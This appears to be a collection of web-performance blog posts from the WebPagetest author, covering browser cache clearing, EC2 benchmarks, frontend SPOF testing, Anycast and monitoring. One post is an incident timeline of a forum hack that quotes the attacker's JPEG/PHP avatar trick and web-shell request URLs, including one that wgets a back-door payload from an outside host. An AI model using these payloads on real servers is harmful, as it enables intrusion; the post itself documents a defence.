When I was testing out the IE 10 implementation the very first run of a given URL would look as you would expect (ignore the really long DNS times - that's just an artifact of my dev VM):
But EVERY subsequent test for the same URL, even across manual cache clears, system reboots, etc would look like this:
That's all well and good (great actually) for web performance but a bit unfortunate if you are trying to test the uncached experience because DNS, socket connect (and I assume SSL/TLS negotiation) is basically free and removed from the equation. It's also really unfortunate if you are comparing browsers and you're not clearing it out because it will be providing an advantage to IE (unless you are also maintaining the heuristic caches in the other browsers).
Clearing out this cache is what has been delaying the IE 10 deployment on WebPagetest and I'm happy to say that I finally have it under control. The data is being stored in a couple of files under "\Microsoft\Windows\WebCache". It would be great if we could just delete the files but they are kept persistently locked by some shared COM service that IE leverages.
My current solution to this is to terminate the processes that host the COM service (dllhost.exe and taskhostex.exe) and then delete the files. If you are doing it manually then you also need to suspend the parent process or stop the COM+ service before terminating the processes because they will re-spawn almost immediately. If anyone has a better way to do it I'd love feedback (the files are mapped into memory so NtDeleteFile doesn't work either).
Browser Initialization
Once you have everything in a pristine state with completely cleared profiles and caches you still have a bit more work to do because you want to test the browser's "first view" performance, not "first run" performance. Each of the browsers will do some initialization work to set up their caches for the first time and you want to make sure that doesn't impact your page performance testing.
Some of the initialization happens on first access, not browser start up so you can't just launch the browser and assume that everything is finished. WebPagetest used to start out with about:blank and then navigate to the page being tested but we found that some browsers would pay a penalty for initializing their caches when they parsed the first HTML that came in and they would block. I believe Sam Saffron was the first to point out the issue when Chrome was not fetching sub-resources as early as it should be (on a page where the head was being flushed out early). In the case of the IE connection heuristics it would also pay a particularly expensive penalty at the start of the page load when it realized that I had trashed the cache.
In order to warm up the various browser engines and make sure that everything is initialized before a page gets tested WebPagetest navigates to a custom blank HTML page at startup. In the WebPagetest case that page is served from a local server on the test machine but it is also up on webpagetest.org: http://www.webpagetest.org/blank.html if you want to see what it does. It's a pretty empty HTML page that has a style and a script block just to make sure everything is warmed up.
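If you want to try the same warm-up approach in your own test rig, a local blank page is easy to serve. Here is a minimal Python sketch, assuming a page with one style block and one script block is enough to exercise the parser, CSS and JavaScript engines. The exact markup is a guess and not a copy of WebPagetest's blank.html, and the handler and function names are hypothetical.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed contents: a nearly empty page with a style and a script block.
BLANK_PAGE = b"""<!DOCTYPE html>
<html>
<head>
<style>body { background-color: #fff; }</style>
<script>var warmedUp = true;</script>
</head>
<body></body>
</html>
"""


class BlankPageHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the same warm-up page for every path.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(BLANK_PAGE)))
        self.end_headers()
        self.wfile.write(BLANK_PAGE)

    def log_message(self, format, *args):
        pass  # keep the test machine's console quiet


def start_blank_server(port: int = 0) -> HTTPServer:
    """Start the warm-up server on localhost in a background thread."""
    server = HTTPServer(("127.0.0.1", port), BlankPageHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Point the browser at the local page first, wait for it to finish loading, and only then navigate to the URL under test.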
Wrap-up
Hopefully this information will be helpful to others who are doing browser performance testing.
You should also be careful taking browser-browser comparisons as gospel. As you can see, there are a lot of things you need to do to get to an apples-to-apples comparison and even then it isn't necessarily what users experience. Browsers are adding more heuristics, pre-connecting and even pre-rendering of pages into the mix and most of the work in getting to a clean "first view" defeats a lot of those techniques.
EC2 Performance
31 May 2012 7:06 AM
WebPagetest makes EC2 AMI's available for people to use for running private instances and makes fairly extensive use of them for running the testing for the Page Speed Service comparisons. We have tested that the m1.small instances produce consistent results but we aren't necessarily sure if they are representative of real end-user machines so I decided to do some testing and see.
This is a very specific test that is just looking to compare the raw CPU performance for web browsing (single threaded) of various EC2 instance sizes against physical machines. It is not meant to be a browser comparison or a statement about EC2 performance beyond this very-specific use case.
Testing Methodology
I ran the SunSpider 0.9.1 benchmark 5 times on each of the different machines using Chrome 19 (it is important to keep the browser and version consistent since changes to the JavaScript engine will affect the results).
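When comparing machines from a handful of runs it helps to look at the spread as well as the average. A small Python sketch of that bookkeeping follows; the function name is hypothetical and the numbers in the usage line are placeholders, not measurements from this test.

```python
from statistics import mean, stdev


def summarize_runs(times_ms):
    """Summarize repeated benchmark totals (milliseconds, lower is better)."""
    avg = mean(times_ms)
    # stdev needs at least two samples; treat a single run as zero spread.
    spread = stdev(times_ms) if len(times_ms) > 1 else 0.0
    return {
        "runs": len(times_ms),
        "mean_ms": avg,
        "stdev_ms": spread,
        "cv_percent": 100.0 * spread / avg,
    }


if __name__ == "__main__":
    # Placeholder values for five runs on one machine.
    print(summarize_runs([250.0, 255.0, 248.0, 252.0, 251.0]))
```

A low coefficient of variation across the five runs is what makes a single instance type usable as a consistent baseline, independent of whether it is representative.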
Results
As you can see, the m1.small instances are significantly slower than desktop systems from the last 5 years or so but they are somewhat faster than more recent low-end laptops. Netbooks and tablets are significantly slower still with times typically in the 1000+ range.
Conclusion
Unfortunately there isn't a clear-cut answer of what you should use to test if you are trying to test on a "representative" system because both the smaller and larger instances are representative of different ends of the computing spectrum.
My general feeling is that websites should not be CPU constrained and if they are then things will look exponentially worse on the tablets, Chromebooks and other cheap devices that are starting to flood the market. If you test using the larger instances then you will be testing on systems more representative of desktops which might be a good thing to do if that is specifically what you are targeting. The small instances are more likely to expose CPU constraints that will crop up in your user base (much like Twitter noticed).
Call for Help
The systems I tested were machines that I had easy access to but are probably not representative of a lot of systems people have at home. If you could run SunSpider using Chrome 19 on any systems you have lying around and share the results as well as the system specs in the comments below I'll update the chart and see if we can build a more representative picture.
*update - chart has been updated with the user-submitted results, thank you
It has been an exciting 2 days. Yesterday I discovered that over the weekend the forums at webpagetest.org had been hacked and that someone had installed a back door. I traced the source of the entry pretty quickly and locked out the exploit he had used but I wanted to make sure he hadn't done anything more damaging while he was there so I spent the last day poring over the access logs to trace back his activities.
The hack involved uploading a custom image file that was both a valid jpeg and had php code inside of it that the php interpreter would execute and then tricking the server into executing the image as if it were php. I have the actual image as well as the command and control php he installed if anyone is interested (and by anyone I mean anyone I know who will do good things with it).
I thought it would be valuable (and somewhat entertaining) to share what I gleaned from the logs so here is the timeline of activities that I managed to piece together (all times are GMT):
March 23, 2012
- Registered for account in the WebPagetest forums and uploaded executable profile pic
- http://www.webpagetest.org/forums/member.php?action=profile&uid=27069
- used (presumably throw-away) yahoo mail account: science_media017@yahoo.com
- from 49.248.26.133 (also logged in to the account from 178.239.51.81 but there has been no recent activity from that IP)
March 30, 2012
109.123.117.122 (probably automated bot/process)
08:48 - Back door is installed and first accessed (install method is highlighted later). Hidden IFrame is added to the forums page.
Periodically - main page is loaded (presumably to check the status of the IFrame)
49.248.26.133 (appears to be manual activity)
08:58 - Loads the main page (presumably checking the IFrame)
April 1, 2012
109.123.117.122
08:49 - Installs adobe.jar (unfortunately I deleted it and didn't keep a copy for analysis), presumably for distribution or more access (no Java on the server though so not much point)
49.248.26.133
09:16 - Accessed the installed adobe.jar (presumably testing to make sure it installed)
April 2, 2012
me
~14:00 - Observed unexpected requests loading and found the IFrame (and quickly deleted it)
17:58 - Tracked down the location of the code that was used to install the IFrame (and unfortunately deleted it in my panic)
18:16 - Secured the hole that was used to execute php in the uploads directory
April 3, 2012
49.248.26.133
05:54 - Checked the main page for the iframe
06:02 - attempted to access gs.php (the back door php code)
69.22.185.30 (manual debugging/activity)
06:03 - Started probing to see what broke - attempted to access:
/forums/uploads/avatars/system1.php
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=ls
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php
/forums/uploads/avatars/avatar_27069.jpg/.php
06:04 - Manually browsed the forums, presumably checking to see if everything was down or just his hack and did some more probing:
/forums/images/on.gif
/forums/images/on.gif/.php to see if the php interpreter hole was still open (was at the time but he couldn't get any code placed there to execute - this has since been closed)
/forums/uploads/avatars/tileeeee.html (404 - already cleaned up)
06:05 - Tried the avatar hack again:
/forums/uploads/avatars/avatar_27069.jpg
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=ls
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php
/forums/uploads/avatars/avatar_27069.jpg/.php
/forums/uploads/avatars/avatar_27069.jpg/
06:06 - Tries other avatar files to see if php hack is blocked on uploads
/forums/uploads/avatars/avatar_1.jpg/.php (yep - 403)
06:07 - Tries other back door commands he had installed:
/forums/uploads/avatars/sys.php
/forums/uploads/avatars/check.php
/forums/uploads/avatars/save.php
/forums/uploads/avatars/
06:10 - More frustration:
/forums/uploads/avatars/gs.php
/forums/uploads/avatars/system1.php
/forums/uploads/avatars/avatar_27069.jpg
/forums/uploads/avatars/avatar_27069.jpg/.php??1=system&2=ls
/forums/uploads/avatars/avatar_27069.jpg/.php
06:14 - Went through the registration UI and actually registered to the forum again
f309017@rppkn.com (throw-away)
http://www.webpagetest.org/forums/member.php?action=profile&uid=27633
06:21 - Activated his registration
209.73.132.37 (switched to another IP to continue manual debugging/activity)
06:29 - Accesses forum using new registration (normal forum browsing, a couple of failed post attempts)
06:31 - Tries to access the admin control panel /forums/admincp (404)
06:35 - Logs out of the forum
06:38 - Tries manually loading various attachments with different attempts to obfuscate the path
06:42 - Tries (unsuccessfully) php execution for attachments /forums/attachment.php?aid=175/.php
06:44 - Tries the old avatar routine again /forums/uploads/avatars/avatar_9.jpg/.php
06:48 - Attempts various probings to see if any other extensions will potentially execute:
/forums/uploads/avatars/avatar_9.jpg?/.s
/forums/uploads/avatars/avatar_9.jpg/.s
/forums/uploads/avatars/avatar_9.jpg?/.hoohl
/forums/uploads/avatars/avatar_9.jpg?/.txt
/forums/uploads/avatars/avatar_9.jpg?/.jsp
/forums/uploads/avatars/avatar_9.jpg/.jsp
/forums/uploads/avatars/avatar_9.jpg/.pdf
/forums/uploads/avatars/avatar_9.jpg/.bin
/forums/uploads/avatars/avatar_9.jpg/.yahoo
/forums/uploads/avatars/avatar_9.jpg/.fucked
/forums/uploads/avatars/avatar_9.jpg/.:(
/forums/uploads/avatars/avatar_9.jpg/.p%20hp
/forums/uploads/avatars/avatar_9.jpg/.avatar_9.p%20hp
06:50 - Tries some of the old files again for some reason:
/forums/uploads/avatars/sys.php
/forums/uploads/avatars/system1.php?dir=%2Fvar%2Fwww%2Fwebpagetest.org%2Fforums%2Fuploads%2Favatars%2Fcsheck.php
06:52 - Tries to use the avatar hack to download his payload again
/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=wget%20http://dl.dropbox.com/u/xxxxxxx/gs.php
06:54 - More futile attempts to probe the avatars directory and understand why things aren't working:
/forums/uploads/avatars/upper.php
/forums/uploads/avatars/php
/forums/uploads/avatars/.php (ding, if he didn't know by now, nothing with .php anywhere inside of uploads will load)
06:55 - Seriously, he is expecting different results?
/forums/uploads/avatars/system1.php?dir=%2Fvar%2Fwww%2Fwebpagetest.org%2Fforums%2F
06:56 - He does some MORE poking around to see if the trailing .php hack is universally blocked (it is now)
/forums/images/smilies/tongue.gif/.php
07:00 - Last trace of access for today
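For anyone wanting to audit their own logs for the same trick, the rule that ended up blocking him ("nothing with .php anywhere inside of uploads will load") can be sketched as a small Python check. This is only an illustration of the rule: the real fix belongs in the web server configuration, and the function name and prefix constant are hypothetical.

```python
from urllib.parse import unquote, urlsplit

# Directory where user-supplied files (avatars, attachments) end up.
UPLOADS_PREFIX = "/forums/uploads/"


def should_block(request_target: str) -> bool:
    """True if a request under the uploads directory mentions .php in its path."""
    # Ignore the query string, decode %-escapes and compare case-insensitively.
    path = unquote(urlsplit(request_target).path).lower()
    return path.startswith(UPLOADS_PREFIX) and ".php" in path


if __name__ == "__main__":
    for target in (
        "/forums/uploads/avatars/avatar_27069.jpg",
        "/forums/uploads/avatars/avatar_27069.jpg/avatar_27069.php?c=ls",
        "/forums/uploads/avatars/avatar_1.jpg/.php",
    ):
        print(should_block(target), target)
```

Running the requests from the timeline through a check like this makes it easy to pull every execution attempt out of an access log, including the ones that piggyback on a legitimate image path.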
Steve Souders had a great blog post last year that talked about Frontend Single Points Of Failure (SPOF). Given the continuing rise in 3rd-party widgets on pages it is becoming increasingly important and I realized that there weren't any good tools for testing for it. Seemed like the perfect opportunity to piece something together so that's exactly what I did.
Testing for Frontend SPOF
Probably the most critical part of testing a failure of a 3rd-party widget is to make sure you get the failure mode correct. When these things fail, the servers usually become unreachable and requests time out. It is important to replicate that behavior and not have the requests fail quickly, otherwise you will see what your site looks like without the content but the experience won't be right (the real experience is Sooooooo much worse).
I looked around for a well-known public blackhole server but couldn't find one so I went ahead and set one up (feel free to use it for your testing as well):
blackhole.webpagetest.org (aka 72.66.115.13)
A blackhole server is a server that can be routed to but all traffic gets dropped on the floor so it behaves exactly like we want when testing the failure mode for 3rd-party widgets.
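The difference between failing fast and timing out is easy to see with a plain TCP connect. Below is a minimal Python sketch (the function name and the outcome labels are made up for illustration) that classifies what happens when you try to connect to a host: a refused connection comes back almost immediately, while a blackhole should sit there until the timeout expires.

```python
import socket
import time


def probe(host: str, port: int = 80, timeout: float = 5.0):
    """Return (outcome, seconds); outcome is 'connected', 'refused',
    'timeout' or 'error'."""
    start = time.monotonic()
    try:
        with socket.create_connection((host, port), timeout=timeout):
            outcome = "connected"
    except socket.timeout:
        outcome = "timeout"   # packets dropped on the floor (blackhole-like)
    except ConnectionRefusedError:
        outcome = "refused"   # fast failure: not what a real outage looks like
    except OSError:
        outcome = "error"     # anything else (DNS failure, unreachable, ...)
    return outcome, time.monotonic() - start


if __name__ == "__main__":
    print(probe("blackhole.webpagetest.org", 80, timeout=5.0))
```

Browsers wait much longer than 5 seconds before giving up on a connection, which is why a blackholed script in the head of a page hurts so much more than one that fails quickly.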
With the blackhole server up and running you can now use it for testing manually or through tools like Webpagetest.
Browsing the broken web
For the purposes of this example I'll be "breaking" the twitter, Facebook and Google buttons as well as the Google API server (jquery, etc) and Google Analytics.
Now that we have a blackhole server, breaking the web is just a matter of populating some entries in your hosts file (C:\Windows\System32\drivers\etc\hosts on windows). Go ahead and add these entries and save the updated hosts file:
72.66.115.13 ajax.googleapis.com
72.66.115.13 apis.google.com
72.66.115.13 www.google-analytics.com
72.66.115.13 connect.facebook.net
72.66.115.13 platform.twitter.com
...and go browse the web. It shouldn't take you long to find a site that is infuriatingly painful to browse. Congratulations, you just experienced a Frontend SPOF - now go fix it so your users don't have to feel the same pain (assuming it is a site you control, otherwise just yell at the owner).
Testing it with WebPagetest
It's a lot easier to discover broken content just by browsing using the hosts file method, but if you find something and need to make the case to someone to get it fixed, nothing works better than a WebPagetest video.
First, test the site as you normally would but make sure to check the "capture video" option (and it's probably not a bad idea to also give it a friendly label).
Next, to capture the broken version of the site you will need to use a script (largely just copy and paste). You need to send the broken domains to the blackhole and then visit the page you are trying to test:
setDnsName ajax.googleapis.com blackhole.webpagetest.org
setDnsName apis.google.com blackhole.webpagetest.org
setDnsName www.google-analytics.com blackhole.webpagetest.org
setDnsName connect.facebook.net blackhole.webpagetest.org
setDnsName platform.twitter.com blackhole.webpagetest.org
navigate your.url.com
Just paste the script into the script box (with the correct URL to be tested), make sure capture video is checked and that you have a friendly label on the test.
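If you test a lot of pages it can be handy to generate both the hosts file entries and the WebPagetest script from one list of domains. Here is a small Python sketch of that; the helper names are hypothetical and the test URL is a placeholder. The separator is a parameter because the script above is shown with spaces while WebPagetest's scripting documentation has described commands as tab-delimited.

```python
BLACKHOLE_HOST = "blackhole.webpagetest.org"
BLACKHOLE_IP = "72.66.115.13"

THIRD_PARTY_DOMAINS = [
    "ajax.googleapis.com",
    "apis.google.com",
    "www.google-analytics.com",
    "connect.facebook.net",
    "platform.twitter.com",
]


def hosts_entries(domains):
    """Lines to append to the hosts file for manual browsing."""
    return "\n".join(f"{BLACKHOLE_IP} {domain}" for domain in domains)


def spof_script(domains, url, sep=" "):
    """WebPagetest script: blackhole each domain, then load the page."""
    lines = [sep.join(("setDnsName", domain, BLACKHOLE_HOST)) for domain in domains]
    lines.append(sep.join(("navigate", url)))
    return "\n".join(lines)


if __name__ == "__main__":
    print(hosts_entries(THIRD_PARTY_DOMAINS))
    print()
    # Placeholder URL: substitute the page you want to test.
    print(spof_script(THIRD_PARTY_DOMAINS, "http://www.example.com/"))
```

Keeping the domain list in one place also makes it easy to break one widget at a time and see which of them is the actual single point of failure.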
Finally, go look at the test history, select the tests that you ran and click compare (the history works best if you log into the site before submitting your tests).
And what would be the fun in it without an example. Here is what happens to Business Insider when Twitter goes down (yeah, THAT never happens):
http://www.webpagetest.org/video/view.php?id=111011_4e0708d3caa23b21a798cc01d0fdb7882a735a7d
Yeah, so it's normally pretty slow but when Twitter goes down the user stares at a blank white screen for 20 seconds! At that point, Business Insider itself may as well be down. Luckily it can easily be solved just by loading the twitter button asynchronously.
Every now and then the topic of Anycast comes up in the context of web performance so I thought I’d take a stab at explaining what it is and the benefits.
tl;dr – DNS servers should always be Anycast (and even some of the largest CDN’s are not so don’t just assume you are covered). Anycast for the web servers/CDN is great if you can pull it off but it’s a lot less common than DNS.
Anycast – the basics
Each server on a network (like the Internet) is usually assigned an address and each address is usually assigned to a single server. Anycast is when you assign the same address to multiple servers and use routing configurations to make sure traffic is routed to the correct server. On private networks where there is no overlap this is pretty easy to manage (just don’t route the Anycast addresses out of the closed network). On the public Internet things are somewhat more complicated since routes change regularly so a given machine could end up talking to different servers at different points in time as routing changes happen on the Internet (congested links, outages, and for hundreds of other reasons).
The routing behavior on a network as large as the Internet means Anycast is not a good fit for stateful long-lived connections but stateless protocols or protocols that recover well can still work. Luckily for the web, the two foundational protocols for web traffic are largely stateless (DNS and HTTP).
DNS Anycast
By far, the most common use for Anycast on the Internet is for DNS (servers and relays). To provide fast DNS response times for users across the globe you need to distribute your authoritative DNS servers (and users need to use DNS relays/servers close to them).
One way to distribute your servers is to give each one a unique address and just list them all as authoritative servers for your domain. Intermediate servers running Bind 8 will try them all and favor the fastest ones but it will still use the slower ones for some percentage of traffic. Bind 9 (last I checked anyway) changed the behavior and no longer favors the fastest so you will end up with a mix of slow and fast responses for all users.
Using Anycast you would distribute your servers globally and give them all the same IP address and you would list a single address (or a couple of Anycast addresses for redundancy) as the authoritative servers for your domain. When a user goes to look up your domain, their DNS relay/server would always get routed to your best authoritative server (by network path, not necessarily physical geography). Since DNS is just a request/response protocol over UDP, it really doesn’t matter if they end up talking to different physical servers for different requests.
So, as long as the routing is managed correctly, DNS Anycast is ALWAYS better than other solutions for a distributed DNS serving infrastructure (at least for performance reasons). You should make sure that you are using Anycast DNS for both your own records as well as any CDNs you might leverage. It works for both the authoritative servers as well as DNS relays that users might use. Google’s public DNS servers for end users are globally distributed but use the Anycast addresses of 8.8.8.8 and 8.8.4.4 so you will always get the fastest DNS performance regardless of where you are and what network you are on.
HTTP Anycast
Even though HTTP is not as stateless as DNS (TCP connections need to be negotiated and maintained), the connections live for a short enough time that Anycast can also work really well for HTTP – though it requires more control over the network to keep routing changes to a minimum.
Typically, geo-distribution of web servers is done by assigning them different IP addresses and then relying on geo-locating DNS to route users to the server closest to them. It usually works well enough but there are some fairly big gotchas:
- The geo-locating DNS server actually sees the address of the user’s DNS server, not the user themselves so it can only provide the server closest to the user’s DNS – not necessarily the user (there is a spec update to relay the actual user IP through in DNS requests so this can be done more accurately).
- The geo-locating is only as good as the knowledge that the service has about which web servers are closest to the user’s DNS servers. It usually works well but it’s not uncommon to see traffic routed to servers that are far away.
- The Time To Live (TTL) on the DNS responses is usually really short (60 seconds) so that dead or overloaded servers can be pulled out as needed. This effectively means that the DNS records can’t be cached by the user’s DNS servers and the requests all have to go back to the authoritative servers.
With Anycast, servers can be deployed globally with the same IP address. When it works well it addresses all of the issues that using DNS to geo-locate has:
- DNS can reply with the same IP address for all users and the address can have a long TTL and be cached by intermediate DNS resolvers.
- In the case of a CDN, you can even assign the Anycast address directly as an A record and avoid the extra step of a CNAME lookup.
- You don’t need to know where the user is. Routing will take care of bringing the user to the closest server regardless of where they or their DNS server are located.
- If you need to take a server offline, you adjust the routing so that traffic goes to the next best physical server.
I’m glossing over a LOT of the complexity in actually managing an Anycast network on the public internet but assuming you (or your provider) can pull it off, Anycast can be a huge win for HTTP performance as well.
All that said, there are only a few implementations that I am aware of for using Anycast for HTTP (and they are all CDN providers). Anycast for HTTP should not be the main focus when picking a CDN since there are a lot of other important factors – the most important of which is to make sure they actually have edge nodes near your users (if you have a lot of users in Australia then pick a provider with edge nodes in Australia FIRST, then compare other features).
It hasn't happened yet but it's a question of when, not if active monitoring of websites for availability and performance will be obsolete. My prediction is that it will happen in the next 5 years though if everything lines up it could be as soon as 2 years away.
By active monitoring I am referring to testing a website on a regular interval and potentially from several locations to see if it is working and how long it takes to load (and bundled in with that the alarming, reporting, etc. that goes with it).
Active monitoring has some pretty strong benefits over any alternatives right now:
- Rich debugging information (resource-level timing, full access to headers and network-level diagnostics)
- Consistency - the test conditions do not vary from one test to the next so there is minimal "noise"
- Predictability - you control the frequency and timing of the tests
- Low-latency alerting - you can get notified within minutes of an event/issue (assuming it is detected)
But it's not all sunshine and roses:
- You only have visibility into the systems/pages that you test (which is usually a TINY fraction of what your users actually use)
- It's expensive. You usually end up picking a few key pages/systems to monitor to keep costs under control
- The more you test, the more load you put on the systems you are monitoring (capacity that should be going to serve your users)
- You can only test from a "representative" set of locations, not everywhere your users actually visit from. This may not seem important if you only serve content from one location, but do you use a CDN? Do you serve ads or use 3rd-party widgets that are served from a CDN? If so then there is no way that you are actually able to test every path your users use to get your content
- The performance is never representative of what the users see. Usually monitoring is done from backbone connections that are close to CDN POPs. Even if you spring for testing on real end-user connections ($$$$) you have to pick a small subset of connection types. Your users visit from office connections, home ISP connections, mobile, satellite and over various different connections even within the house.
So, none of this is new, why now and what is going to replace it?
There are several different advances that are converging that will make it possible to collect, report and act on REAL end user data (Real User Monitoring - RUM). There are several issues with using data from the field but between advances in the browsers and Big Data they are on the verge of being solved:
First off, getting the rich diagnostic information from the field. Monitoring is useless if you can't identify the cause of a problem and historically you have had very little insight into what is going on inside of a browser. That all started to change last year when the W3C Web Performance Working Group formed. They are working on defining standards for browsers to expose rich diagnostic/timing information to the pages. The first spec that has been implemented is the Navigation Timing standard which exposes information at a page-level about the timings of various browser actions. The Navigation Timing spec has already been implemented in IE9 and Chrome and will be coming soon in the other major browsers. Even more interesting will be the Resource Timing standard which will expose information about every resource that is loaded.
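To make that a little more concrete, here is a minimal Python sketch of what a collection endpoint might do with a Navigation Timing beacon. The attribute names (navigationStart, domainLookupStart and so on) come from the Navigation Timing interface; the beacon format, the function name and the values in the usage example are assumptions made up for illustration.

```python
def page_metrics(timing: dict) -> dict:
    """Derive phase durations (ms) from Navigation Timing attributes.

    `timing` is assumed to be a dict of epoch-millisecond timestamps that the
    page copied out of window.performance.timing and sent back as a beacon.
    """
    start = timing["navigationStart"]
    return {
        "dns_ms": timing["domainLookupEnd"] - timing["domainLookupStart"],
        "connect_ms": timing["connectEnd"] - timing["connectStart"],
        "ttfb_ms": timing["responseStart"] - start,
        "load_ms": timing["loadEventStart"] - start,
    }


if __name__ == "__main__":
    # Made-up timestamps for a single page view.
    beacon = {
        "navigationStart": 1000,
        "domainLookupStart": 1005,
        "domainLookupEnd": 1045,
        "connectStart": 1045,
        "connectEnd": 1105,
        "responseStart": 1300,
        "loadEventStart": 3500,
    }
    print(page_metrics(beacon))
```

That is the same DNS, connect, time-to-first-byte and load breakdown you get from an active test, except it comes from every real page view instead of a handful of scheduled ones.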
HTML5 also opens up the possibility to store data in local storage in the case where a failure can't be reported (to allow for it to be reported later) and for pages that leverage the Application Cache you can even run completely offline and detect failures to reach the site in the first place.
OK, so we will be able to get the rich diagnostics from the field (and collect data from the real user sessions so you get coverage on everything the users do on your site, from everywhere they visit, etc) - that's a lot of data, what do you do with it?
Big Data to the rescue. Data storage and analysis for huge data sets has started to explode, primarily driven by Hadoop, but there are tons of commercial companies and services entering the space. It's already possible to store, process and analyze petabytes (and more) very efficiently and things are only going to improve. We are quickly evolving towards a world where we collect everything and then slice and dice it later. That's pretty much exactly what you need to do with field data to investigate trends or dig into issues.
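On a toy scale, "slice and dice it later" just means keeping the raw samples and deciding on the grouping at query time. Here is a rough sketch of that, with the caveat that the `RumSample` fields, the sample values and the `medianBy` helper are all invented for illustration (a real data set would live in something like Hadoop, not an array).

```typescript
// One beacon from the field; the fields are hypothetical examples of dimensions.
interface RumSample {
  connection: string;
  browser: string;
  loadTimeMs: number;
}

// Median of a non-empty list of numbers.
function median(values: number[]): number {
  const sorted = values.slice().sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Group the raw samples by whichever dimension is asked for and
// report the median load time of each group.
function medianBy(samples: RumSample[], key: "connection" | "browser"): Record<string, number> {
  const groups: Record<string, number[]> = {};
  for (const s of samples) {
    const bucket = s[key];
    (groups[bucket] = groups[bucket] || []).push(s.loadTimeMs);
  }
  const result: Record<string, number> = {};
  for (const bucket of Object.keys(groups)) {
    result[bucket] = median(groups[bucket]);
  }
  return result;
}

// Made-up samples, only to exercise the functions above.
const rumSamples: RumSample[] = [
  { connection: "cable", browser: "Chrome", loadTimeMs: 1800 },
  { connection: "cable", browser: "IE9", loadTimeMs: 2200 },
  { connection: "cable", browser: "Chrome", loadTimeMs: 2000 },
  { connection: "3g", browser: "Chrome", loadTimeMs: 6400 },
  { connection: "3g", browser: "IE9", loadTimeMs: 7000 },
];

// The same raw data answers two different questions after the fact.
const byConnection = medianBy(rumSamples, "connection");
const byBrowser = medianBy(rumSamples, "browser");
console.log(byConnection, byBrowser);
```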
Why 2-5 years and not now?
Adoption.
Browsers that support the new standards will take a while to reach critical mass (and the Resource Timing spec isn't defined yet). There are also no services or toolkits yet that do good field monitoring so it will take a while for those to evolve and mature.
I'm curious to see if the traditional beacon services (Omniture, comScore, etc) step into this space, if the traditional monitoring providers adapt or if a new breed of startups catches them all off guard. I am a little surprised that most of the participation in the standards process is coming from the browser vendors themselves trying to anticipate how the data would be used - I'd expect to see more of the monitoring services playing an active role if it was on their radar.
Well, I've been promising to do it for a while and it's finally ready. If you've ever wondered what the facility looks like that runs the Dulles test location for WebPagetest (and soon the Web Server), here you go...
First up, here is the secure entrance to the cage securely below ground level in case of tornados or other such craziness (yes, in case you're wondering - my basement).
Here are the physical machines grinding away day and night running your tests. They are co-located with the "climate and humidity control system" (furnace). The unRAID file server is completely unrelated to WebPagetest, it just happens to be sitting there (and I'm a huge fan of the technology - I can RAID a massive array of disks but only the disk being accessed at a given time spins up so it's great for power consumption).
Around the corner we have the brand-spanking-new web server that will be running WebPagetest.org (among other random personal sites). The VoIP converter just happens to be there because that's where my phone line comes in and it's great for blocking telemarketers and keeping the phone from ringing when the kids are sleeping.
Finally, we have the heart of the data center tour, the network that pulls it all together. I've been completely spoiled by FIOS. Seriously low latency high bandwidth connectivity right to the home. The bulk of that wiring is really just my house and random devices (yes, all of the plugged in ports are live - everything has a network connection these days). The BSD router is overkill these days. It was there originally because the traffic shaping was done there but now that it has moved into the testers themselves I need to get around to replacing it with something a little less power hungry.
And there you have it. The Meenan Data Center in all its glory!
This is what open source is all about!
Today we are taking the first step in combining the optimization checks done by Page Speed and WebPagetest by making the Page Speed results available from within WebPagetest (and from an IE browser for the first time). Huge thanks go out to the Page Speed team and Bryan McQuade in particular who did the bulk of the work getting it integrated into the Pagetest browser plugin (as well as Steve Souders for encouraging us to collaborate).
What You Will See
In your test results you will now be getting your Page Speed score along with the normal optimization checks that are done by WebPagetest:
Clicking on the link will take you to the details from Page Speed about the various checks and what needs to be fixed:
What's next?
As I mentioned, this is just the first step. The long-term plans are to take the best of both tools, enhance the Page Speed checks and standardize on Page Speed for optimization checking. You'll probably see the individual rules start to migrate slowly (with things like gzip and caching being no-brainers since the logic is essentially identical between the two tools) so it should be pretty seamless from the end-user perspective. You will also see the Page Speed checks enhanced to include the DOM-based checks that you're used to seeing in the Firefox plugin.
If you've been over to WebPagetest today you may have noticed that things have changed a bit (after you double-checked to make sure you were really at the correct site). Thanks to Neustar Webmetrics (and Lenny Rachitsky in particular) for kicking in an actual designer to bring the UI out of the dark ages. Hopefully performance testing will be less intimidating to new users while still keeping all of the functionality that the more advanced users like. All of the existing functionality is still there (with very similar navigation) but there are a few enhancements I managed to get in with the update as well...
Feeds
Right at the bottom of the site (across all of the pages) is a blogroll (left column) of performance-focused blogs and a feed of recent discussions (right column) that pulls from the WebPagetest forums, the Yahoo Exceptional Performance group and the "Make the Web Faster" Google group. If you have a blog that you would like included (that is focused on web performance) shoot it to me and I'll get it added to the feed.
Simplified Navigation
There used to be 3 separate "landing" pages. One with some high-level information, one for testing individual pages and one for running visual comparisons. All three have been collapsed into a single page.
New Performance Documentation Wiki
There are a lot of discussions in the forums that end up with really valuable information on how to fix something (keep-alives being broken for IE on Apache comes up frequently). I decided to set up a new destination to serve as a place to document these findings as well as serve as a central repository for performance knowledge.
Web Performance Central is an open wiki for the community to contribute to the knowledge base of performance. I will be hosting my documentation there and it is open for anyone else to do the same and hopefully we can start getting a reasonable knowledge base built (it's really bare right now - mostly just the site).
I'll commit to running the site without any branding and with no advertising so it can be a completely unbiased source for performance information.
More Prominent Grades
The grades for the key optimizations are now across the top of all of the results pages and clicking on any of them will take you to the list of requests/objects that caused the failure. Eventually when the documentation is in place I hope to also link the labels to information on how to fix the problem.
Social Sharing
I also bit the bullet and added a 3rd party widget to make it easier to share results. It saves a couple of steps and makes it a lot easier to tweet things like "Wow, site X is painfully slow", etc. I was a little torn because the addthis widget messes up the layout of the page a little bit in IE7 and below but let's face it, I don't expect that the target demographic for WebPagetest would be using outdated browsers so it was a tradeoff I was willing to make.
New Logo
